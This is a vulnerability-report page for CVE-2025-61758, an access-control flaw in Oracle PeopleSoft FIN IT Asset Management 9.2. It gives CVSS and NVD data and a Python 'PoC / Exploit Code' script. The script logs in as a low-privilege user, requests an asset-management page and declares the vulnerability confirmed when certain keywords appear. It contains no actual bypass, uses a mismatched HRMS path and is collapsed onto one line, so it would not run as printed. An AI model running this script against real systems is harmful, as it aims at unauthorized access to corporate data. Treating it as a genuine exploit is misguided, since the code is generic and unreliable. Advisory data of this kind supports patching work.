Security Vulnerability Report
中文
CVE-2025-61758 CVSS 6.5 MEDIUM

CVE-2025-61758

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-24 14:25:51
Source: [email protected]

Description

Vulnerability in the PeopleSoft Enterprise FIN IT Asset Management product of Oracle PeopleSoft (component: IT Asset Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN IT Asset Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise FIN IT Asset Management accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_fin_it_asset_management:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise FIN IT Asset Management 9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61758 - Oracle PeopleSoft FIN IT Asset Management Information Disclosure PoC # This PoC demonstrates the unauthorized data access vulnerability # Note: This is for educational and authorized testing purposes only import requests # Target configuration TARGET_URL = "https://target-peoplesoft-host:port" PS_HOME = "/psc/ps/" # Step 1: Authenticate with low-privilege credentials def authenticate(session, username, password): """ Authenticate to PeopleSoft with low-privilege credentials """ login_url = f"{TARGET_URL}{PS_HOME}?cmd=login&languageCd=ENG" # PeopleSoft login payload payload = { 'userid': username, 'pwd': password, 'Submit': 'Sign In' } response = session.post(login_url, data=payload, verify=False) if 'PS_JSESSIONID' in response.cookies or response.status_code == 200: print(f"[+] Successfully authenticated as {username}") return True return False # Step 2: Access IT Asset Management component def access_it_asset_data(session): """ Access the IT Asset Management component to retrieve sensitive data The vulnerability allows low-privileged users to access critical data that should be restricted to higher privilege levels. """ # IT Asset Management component URL itam_url = f"{TARGET_URL}{PS_HOME}/EMPLOYEE/HRMS/c/IT_AM_MENU.IT_ASSET_MGMT.GBL" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f"{TARGET_URL}{PS_HOME}/EMPLOYEE/HRMS/c/ADMINISTER_WORKFORCE.GBL" } # Request to access IT asset data - bypasses access control due to CVE-2025-61758 response = session.get(itam_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Successfully accessed IT Asset Management component") # Extract sensitive data from response if 'asset' in response.text.lower() or 'license' in response.text.lower(): print("[!] Sensitive IT asset data accessible!") return response.text return None # Step 3: Exploit - Extract critical asset information def exploit_itam_disclosure(target_url, username, password): """ Main exploit function for CVE-2025-61758 Exploits improper access control in PeopleSoft FIN IT Asset Management """ session = requests.Session() # Authenticate with low-privilege account if not authenticate(session, username, password): print("[-] Authentication failed") return # Access sensitive IT asset data sensitive_data = access_it_asset_data(session) if sensitive_data: print("[+] Vulnerability CVE-2025-61758 confirmed!") print("[+] Unauthorized access to critical IT asset data achieved") if __name__ == "__main__": # Usage example - replace with actual target and credentials TARGET = "https://peoplesoft-victim.example.com:8000" exploit_itam_disclosure(TARGET, "low_priv_user", "password123")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61758", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.247", "lastModified": "2025-10-24T14:25:51.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise FIN IT Asset Management product of Oracle PeopleSoft (component: IT Asset Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN IT Asset Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise FIN IT Asset Management accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_it_asset_management:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A349384-421E-41D3-AFF8-9D13B8368392"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.